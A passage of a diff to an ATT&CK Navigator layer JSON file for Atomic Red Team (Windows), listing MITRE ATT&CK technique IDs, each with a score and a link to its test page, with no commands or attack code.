02/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218